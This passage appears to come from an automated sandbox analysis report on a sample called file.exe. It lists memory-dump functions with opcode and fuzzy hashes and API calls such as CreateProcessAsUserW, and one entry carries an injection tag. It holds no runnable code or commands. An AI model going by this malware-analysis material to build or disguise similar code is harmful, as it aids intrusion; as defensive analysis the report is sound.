Instruction ID: 8d1ea4cc8e8b7bcb3978c0999e478aeb1baeaf8d38c99749588209eadc5b1c58
Opcode Fuzzy Hash: 60db883ff43d39cfe9fbc3e487bfd20fa022e802a245222ed9aea77935130b92
Instruction Fuzzy Hash: 03210B7170E3918FCB06ABB8DC6529DBF71BF47210B4904DBD098DB292CA3C581AC362

Function 00B2D4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4645331252.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b2d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d63fdadfcf3c494b1ddb86ce39d9c6d83c34ae6f1d2018378d39246f4f737863
Instruction ID: e216debae5d5a9205faf7d92ce6fac6fae51c22bacd1b030442bb5cc0bddc4ac
Opcode Fuzzy Hash: d63fdadfcf3c494b1ddb86ce39d9c6d83c34ae6f1d2018378d39246f4f737863
Instruction Fuzzy Hash: 23212871504240DFDB05DF14E9C0B26BFA5FBA4318F20C1ADD90D0B256C37AD855CBA2

Function 079CCF40 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53454046fff1b38d5a815c9f654c2479843cb921c96374f5b2d26f77dabe395c
Instruction ID: 53425d5c87a27fb255f8bcf2a987da63eae99d58d812d605cb77e54b564caae3
Opcode Fuzzy Hash: 53454046fff1b38d5a815c9f654c2479843cb921c96374f5b2d26f77dabe395c
Instruction Fuzzy Hash: FD11AF71B152218BC708BBB9EC9976F77BAFF88210F804929D008D7344DE389C05C3A1

Function 00B80848 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c27500cac1ce6c6fb22985024198df73b4816615057cd77cef99f656aa4101f0
Instruction ID: 9fe3ad1f0ee9b6caf772b0a78c486ac2783070d46129ee9e51e8a1af53fa84f9
Opcode Fuzzy Hash: c27500cac1ce6c6fb22985024198df73b4816615057cd77cef99f656aa4101f0
Instruction Fuzzy Hash: FE213975D012088BDB04EFAAD4147EEFBF6BB89301F14D06AD415B72A4DB384A49CFA4

Function 00B3D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4645487503.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b3d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef1ad6c13ccda82eacc300bcec9fbaf6c6d5d5fea1f6d50af6542ef6384584ae
Instruction ID: 5508938f2b201f246df2a241e719b7168f1724eb4335e02e038719ea3ece3e27
Opcode Fuzzy Hash: ef1ad6c13ccda82eacc300bcec9fbaf6c6d5d5fea1f6d50af6542ef6384584ae
Instruction Fuzzy Hash: 4B212671604304EFDB05DF24E9C0B26BBE5FB84314F30C5ADE9094B292C376D84ACA61

Function 00B3D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4645487503.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b3d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec5bbb59c14bd6ba1068101c9b7901786c64fc977384ba056f3db00d70befd2d
Instruction ID: 5ad1b639521f9040a148d6b2e6f9a0421dd93191f9665e41fb04929bd39325c6
Opcode Fuzzy Hash: ec5bbb59c14bd6ba1068101c9b7901786c64fc977384ba056f3db00d70befd2d
Instruction Fuzzy Hash: C1210771604304EFDB18DF24E5D0B16BBA5FB84714F30C5ADD9494B256C336D847CA61

Function 00B3D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4645487503.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b3d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e609bf927f50b5ad121b9665ef9a3a4ab56189c2b1ed0d00789959f089223b55
Instruction ID: 18565a70bcbde658924d83f95f593901941a96feebdcb9a0abf7805f1df3746d
Opcode Fuzzy Hash: e609bf927f50b5ad121b9665ef9a3a4ab56189c2b1ed0d00789959f089223b55
Instruction Fuzzy Hash: 112180755083809FCB06CF24D994B11BFB1EB46314F28C5DAD8498F2A7C33A980ACB62

Function 00B86089 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe0dc58b4a7718184867f4c25e45976503369902773aa20dfc21799af589ba91
Instruction ID: 0a878c8a70ca8015eb0a583ad14d0496d5ca82c02fe8e2b2fd866e3e5da09935
Opcode Fuzzy Hash: fe0dc58b4a7718184867f4c25e45976503369902773aa20dfc21799af589ba91
Instruction Fuzzy Hash: A821D6316042149FDB05BF64E89876A7BE1EB88714F1081B8F9199F366CB39CC51CB60

Function 079CED59 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78ab115a47a943387e9989113da5e09d1b6cafe14fd1d065a4b00ed931e81f1a
Instruction ID: 68bf139763425086afb3ebcf41a998d469919b6d745af51158f9acfa46ced1cf
Opcode Fuzzy Hash: 78ab115a47a943387e9989113da5e09d1b6cafe14fd1d065a4b00ed931e81f1a
Instruction Fuzzy Hash: FB210879E00209EFDB04CFA9D944AADBBF6FF88300F18C4AA9519D7315E7749A01CB41

Function 079CCEEF Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4939710784540c0d37d51ee30c4b3e7255c3dba66f428044fbe9950b88c295f8
Instruction ID: a77b4ad1e2f29096982c9fa0e804376f8e55e7ce621878094aae744c9125733b
Opcode Fuzzy Hash: 4939710784540c0d37d51ee30c4b3e7255c3dba66f428044fbe9950b88c295f8
Instruction Fuzzy Hash: DE11A971B152118BDB08BBBDEC9A26EB7B2BF88214F844A79D059D7344DF389C45C391

Function 00B84DCC Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0845c169bfeddbda84e0196f8a8b51e57ab608db5da99b56b648e3df2b09d1d
Instruction ID: f3d5f7b604c3f262d8613a3166886596b97c3228a60ddcd9309add5d98ed8981
Opcode Fuzzy Hash: b0845c169bfeddbda84e0196f8a8b51e57ab608db5da99b56b648e3df2b09d1d
Instruction Fuzzy Hash: B221D674E002099FDB04DFAAD844BAEBBF1AF89311F149069E415B77A0DB745941CF54

Function 00B880ED Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec4c99ea3c97aedc9a78780c50270395b5adca008a677798e1968de1b2c78c01
Instruction ID: 28304d17d5afb157bb9ad17532f526b441a9aec5b1394385cfa5d125ddd2bdf4
Opcode Fuzzy Hash: ec4c99ea3c97aedc9a78780c50270395b5adca008a677798e1968de1b2c78c01
Instruction Fuzzy Hash: 9B119631900208DFDB10EF94D848FAABBF5EB48311F4480AEE5199B661DB71ED45CF50

Function 00B80838 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b822227fabf4c95dcf0eac90498f4dc82430629138347ff6af1ecc3957809c
Instruction ID: 4e6523c29e347be1ec4e381cd196d842e082ac50c4dd9083a73fbbd4f6137273
Opcode Fuzzy Hash: 89b822227fabf4c95dcf0eac90498f4dc82430629138347ff6af1ecc3957809c
Instruction Fuzzy Hash: 71119175D052488FDB04DFAAD4147EEBBF2ABC9300F14D06AC415B72A4DB38094ACF60

Function 00B2D49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4645331252.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b2d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction ID: b66b6bd94fd97f1b9bb65b338504bc813bbffa65512beed05d4a1a9c17778213
Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction Fuzzy Hash: A911D376904280DFDB16CF14D5C4B16BFB1FB94324F24C5A9D9090B256C37AD85ACBA2

Function 00B3D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4645487503.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b3d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction ID: 569ea1c2ac5fd20133c2cac1432afea1b5bd26b9458b0f045b6ba4cde464deb1
Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction Fuzzy Hash: 95118B75904284DFCB16CF10D9C4B16FBA1FB84314F24C6A9D8494B696C33AD85ACB62

Function 00B8FD68 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e3f076502a97c1219c1f8d0db1059c828aa706fd410a5219fa30283194d0f8e
Instruction ID: 314bbefd6c60eb50815cff82b0c500ef85af72aca9d25d49d505e88425512f42
Opcode Fuzzy Hash: 8e3f076502a97c1219c1f8d0db1059c828aa706fd410a5219fa30283194d0f8e
Instruction Fuzzy Hash: A8118231A006159FCB60EB68DC48FAD77B1EF44720F1445B5E6699B2A0DB70AD45CB80

Function 00B2D80D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4645331252.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b2d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c84089a9cc8d2a20188c20579019a34ab2a915db84319fe4fe155ad78079117e
Instruction ID: 16bcf6bcefa5cc949cca788a6ef835af75df4c0708b5e6f3a08ee7d65c037505
Opcode Fuzzy Hash: c84089a9cc8d2a20188c20579019a34ab2a915db84319fe4fe155ad78079117e
Instruction Fuzzy Hash: 3D01F271004350EAE7104B26E884B66FBD8EF42364F18C09AEE0D0E286D3789840C6B2

Function 00B8FE08 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a1bee0152f3ccc9b10d0896472df9dc3cd1c00a7bc1ff648e4d3ceb1d2ed171
Instruction ID: 189f7a837f05e99cf2c0329ff826ac74cca55bb8d3a9585c6599267c12f73446
Opcode Fuzzy Hash: 4a1bee0152f3ccc9b10d0896472df9dc3cd1c00a7bc1ff648e4d3ceb1d2ed171
Instruction Fuzzy Hash: 0C015A70200706CFD7649F68D888B6AB7E4FB49325F104679E169CB3A1EB70AC45CB90

Function 079C0E7E Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce999b949fbb94f64e413f597312fb526c707e439d2f68a2553365bead56e40b
Instruction ID: 2b985b4b208699b425ee4e76a2d1cfd4927d692cc14fe494534171d457a40575
Opcode Fuzzy Hash: ce999b949fbb94f64e413f597312fb526c707e439d2f68a2553365bead56e40b
Instruction Fuzzy Hash: 52015EA190E3CA9FC703EB7498206997FB09F17244B0945EBC585DF1A3E9690908CB66

Function 00B84D40 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3845f1f00dd8cef6225dd542a07eeb79ce77dbff8acceb0049bbbd773a4465ef
Instruction ID: 9f1d7f4055d135e49ee1780128d713499309e4d1d09df5cb662278c216cff8e9
Opcode Fuzzy Hash: 3845f1f00dd8cef6225dd542a07eeb79ce77dbff8acceb0049bbbd773a4465ef
Instruction Fuzzy Hash: 3401D3B4D04219DFDB40EFA9D5483ADBBF4BB08300F2088AAD419A7361E7745A44CB61

Function 00B84D3C Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c6a0755d362d5a8eda7d7252989bf92fd14d14a70c8f2a98843dbc863f063e6
Instruction ID: f547855854b25a5291e3f061723c80f44dc042e3cf1d6d033a2d2b29e8e9a64f
Opcode Fuzzy Hash: 2c6a0755d362d5a8eda7d7252989bf92fd14d14a70c8f2a98843dbc863f063e6
Instruction Fuzzy Hash: 5E0146B4D00209DFDB40EFA8D1083EDBBF0EB09300F2484AAD418B7261EB748B44CB61

Function 00B2D80C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4645331252.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b2d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9e519e4fb3bf443ba68a70d605fbcdb9e9f6539fc83175f614291089974612
Instruction ID: 7100ba03d940dc39b50b6636d4aa0bb0209977cd2448af57a13620739f553a7d
Opcode Fuzzy Hash: ca9e519e4fb3bf443ba68a70d605fbcdb9e9f6539fc83175f614291089974612
Instruction Fuzzy Hash: 33F06271405354EEE7108E16D884B62FFD8EB51774F18C45AED4C5F296C3799844CAB1

Function 079C0EF0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59d5051417040e23172b5d187bcf6c7e14ca3182b81da555d443f576c01a5a68
Instruction ID: 894d1cc277b162518cbad430cdebb1fcc279f61d7e8a99c0eada73870cfd529c
Opcode Fuzzy Hash: 59d5051417040e23172b5d187bcf6c7e14ca3182b81da555d443f576c01a5a68
Instruction Fuzzy Hash: 76E022253043A85BE3146B36B8147BE7B879BCA220F18C8BEE809CB784CDB5480083A4

Function 079C8AF1 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 707c8b62d09cfa48940a3515ce693c3b88e469b41329f5fc0040a54b09b9ca7f
Instruction ID: 8cd2dfddfc3b4b165a52fb4d264c5b57f80a9f68359053e1be61267ed77cf7ab
Opcode Fuzzy Hash: 707c8b62d09cfa48940a3515ce693c3b88e469b41329f5fc0040a54b09b9ca7f
Instruction Fuzzy Hash: 6EE0E5B1209385CFE7216B70EC2C6243B69BB0660675840BAE44ACAAA1DB319801CB32

Function 079CDD25 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e21f7971ba7f8b3e32dfed6767f439b968573ca93307abb16d2a77d1ca138c0e
Instruction ID: cedafc9c627003c3265160932fb749e97cd9ad5018b4382cab73607a938c83a7
Opcode Fuzzy Hash: e21f7971ba7f8b3e32dfed6767f439b968573ca93307abb16d2a77d1ca138c0e
Instruction Fuzzy Hash: E9F04EB4A052198FCB54DF98CA81B99BBB1BF88304F24509AD509F7715D734AE81CF25

Function 079C0EB8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87d6addcdb2c24f871b3c37c1e546548880585ed0740f78f33809fe528ead40a
Instruction ID: 34eb496156ef93caa2c232d0e90af03580f65d50a59b48abae853fcbb3377396
Opcode Fuzzy Hash: 87d6addcdb2c24f871b3c37c1e546548880585ed0740f78f33809fe528ead40a
Instruction Fuzzy Hash: 74D012B090910DEBCB00DFB4ED116ADBBF5EB45204B1049BDD409D7340EA711F009BA5

Function 00B8A525 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9183fc75dbf703ae209167239bb4625177373511e24bf4cc70f3814efc84aadc
Instruction ID: 9e445068a009fbc6f85652c82237d6dab081e8d36b92eb7740a9ccfe60921c38
Opcode Fuzzy Hash: 9183fc75dbf703ae209167239bb4625177373511e24bf4cc70f3814efc84aadc
Instruction Fuzzy Hash: 3AD0677BB402089FDB049F99EC409DDB776FB98221B448116F915E3260C6319965DB60

Function 00B87964 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e21aea0448e71bdee00508b27582af967d764443329ea71e37f81617718becb
Instruction ID: bd9465dd66f0f6483e5c3ff06e27a7492f0c42406894537f26e96125fca89316
Opcode Fuzzy Hash: 1e21aea0448e71bdee00508b27582af967d764443329ea71e37f81617718becb
Instruction Fuzzy Hash: FAD0A77014834A8AD603F779BC64A997F6AEA81600B504564E1098F11ADE6859058AD0

Function 079CDBD1 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97d14fd245105c61b5c5390f62548b384c2565a38959fa6000b92831b58b44a9
Instruction ID: 3bc89b48c47cc58b48a12eb82fb882162db517d226353b41527c1a269b5a111c
Opcode Fuzzy Hash: 97d14fd245105c61b5c5390f62548b384c2565a38959fa6000b92831b58b44a9
Instruction Fuzzy Hash: A5E0B630601345CFCB64DB61D984848B7B2FF49301F5494A8E1069B368C735E981CE11

Function 00B87968 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cfe82f3cd188bf37a5899fad696da5188d2cc383f11a05e4187a7cadfbf21ee
Instruction ID: 2876111b06dad40ac351c1660a43c167ca12f1a488ef191070451e145e27bb06
Opcode Fuzzy Hash: 2cfe82f3cd188bf37a5899fad696da5188d2cc383f11a05e4187a7cadfbf21ee
Instruction Fuzzy Hash: E1C012B414830A86D601F779FC94A997B6AFA807007509524A20A0E11AEE7869458AD0

Analysis Process: file.exePID: 6524, Parent PID: 6704COMMON

Execution Graph

Execution Coverage:	17.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	131
Total number of Limit Nodes:	10

Executed Functions

Function 064AED44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 064AEE62

Strings

J)lv, xrefs: 064AED7E
J)lv, xrefs: 064AED9E

Memory Dump Source

Source File: 0000000D.00000002.4083235385.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_64a0000_file.jbxd

Similarity

API ID: CreateWindow
String ID: J)lv$J)lv
API String ID: 716092398-1572573271
Opcode ID: 93f29df89970e3a9b3dfd6027bbe72d25db13b09d1b39ae4cec799ee8bbd3c31
Instruction ID: d9fc2b3f6ae0e6131960557647350764728396b7d77cac0028c2f4554630bdff
Opcode Fuzzy Hash: 93f29df89970e3a9b3dfd6027bbe72d25db13b09d1b39ae4cec799ee8bbd3c31
Instruction Fuzzy Hash: D951B0B1D00349EFDB14CF9AC894ADEFBB5BF88310F64812AE418AB250D7759845CF90

Function 064AED50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 064AEE62

Strings

J)lv, xrefs: 064AED7E
J)lv, xrefs: 064AED9E

Memory Dump Source

Source File: 0000000D.00000002.4083235385.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_64a0000_file.jbxd

Similarity

API ID: CreateWindow
String ID: J)lv$J)lv
API String ID: 716092398-1572573271
Opcode ID: bb77d225232329128085f4afe2e75b2fabcef36035957e2af8b924686566b85d
Instruction ID: 8393f9151cd4af2b0a29a2b73ac6a2240a53a0b53fbd0a18aa4f5bf910f688f8
Opcode Fuzzy Hash: bb77d225232329128085f4afe2e75b2fabcef36035957e2af8b924686566b85d
Instruction Fuzzy Hash: C041A0B1D00349EFDB14CF9AC894ADEBBB5FF88310F64812AE818AB250D7759845CF90

Function 064A8450 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 064A86A6

Strings

J)lv, xrefs: 064A865F

Memory Dump Source

Source File: 0000000D.00000002.4083235385.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_64a0000_file.jbxd

Similarity

API ID: HandleModule
String ID: J)lv
API String ID: 4139908857-2455759496
Opcode ID: 96306831ac31c6d581e17abde4dd9ceb587a22ea11dddc17a5902d5ede4f6986
Instruction ID: 17cbfa3eb1932528dcf8cd4135201a16c3005de9468c7fa587288c76dde8057b
Opcode Fuzzy Hash: 96306831ac31c6d581e17abde4dd9ceb587a22ea11dddc17a5902d5ede4f6986
Instruction Fuzzy Hash: F4714770A00B059FDB65DF2AD45075ABBF1FF88200F10892ED45ADBB50DB75E909CB90

Function 07D7A988 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07D7AAF3

Strings

J)lv, xrefs: 07D7A9C9

Memory Dump Source

Source File: 0000000D.00000002.4084334006.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7d70000_file.jbxd

Similarity

API ID: CreateProcessUser
String ID: J)lv
API String ID: 2217836671-2455759496
Opcode ID: 330fe4d339d81ae2dd9b2966ccf7a7c04b13ac4b27f891ac7005bfecd5533a26
Instruction ID: 30f8901d20a3f51bf4df1dc9395ef7199ba7f98229bc8855c26c29b85ea9ee20
Opcode Fuzzy Hash: 330fe4d339d81ae2dd9b2966ccf7a7c04b13ac4b27f891ac7005bfecd5533a26
Instruction Fuzzy Hash: E551E9B190022ADFDB64CF59C940BDDBBB5BF88310F0485AAE918B7250DB759A85CF90

Function 06490C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06490D31

Strings

J)lv, xrefs: 06490C87

Memory Dump Source

Source File: 0000000D.00000002.4083176043.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6490000_file.jbxd

Similarity

API ID: CallProcWindow
String ID: J)lv
API String ID: 2714655100-2455759496
Opcode ID: c589767481c295dd4df370c3543719f39954923e5b587a634c9c205a3cffb89f
Instruction ID: 93dd937d872c0e901d462a952acada9af15b9f1792b5923a4cb80a0660c49be3
Opcode Fuzzy Hash: c589767481c295dd4df370c3543719f39954923e5b587a634c9c205a3cffb89f
Instruction Fuzzy Hash: 5F4124B4A00709CFDB54CF89C848AAABBF5FB88714F24C459D519AB321D734A841CBA0

Function 064A6EC8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004B), ref: 064A6FAD

Strings

J)lv, xrefs: 064A6F5F

Memory Dump Source

Source File: 0000000D.00000002.4083235385.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_64a0000_file.jbxd

Similarity

API ID: MetricsSystem
String ID: J)lv
API String ID: 4116985748-2455759496
Opcode ID: d891dd78d0e1ba14eb3a6db7acb1296ef8e490768596c8ac9a52cebd23cb3bbe
Instruction ID: a5809a55633354f6b9f258e64f7aa9873532cebd093e6da5b8db21aab3468c42
Opcode Fuzzy Hash: d891dd78d0e1ba14eb3a6db7acb1296ef8e490768596c8ac9a52cebd23cb3bbe
Instruction Fuzzy Hash: 91313471904784DEDB12CFA6E8053AA7FB4EB15310F09809FE498AB3C2D7398608CF61

Function 07D7CEA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

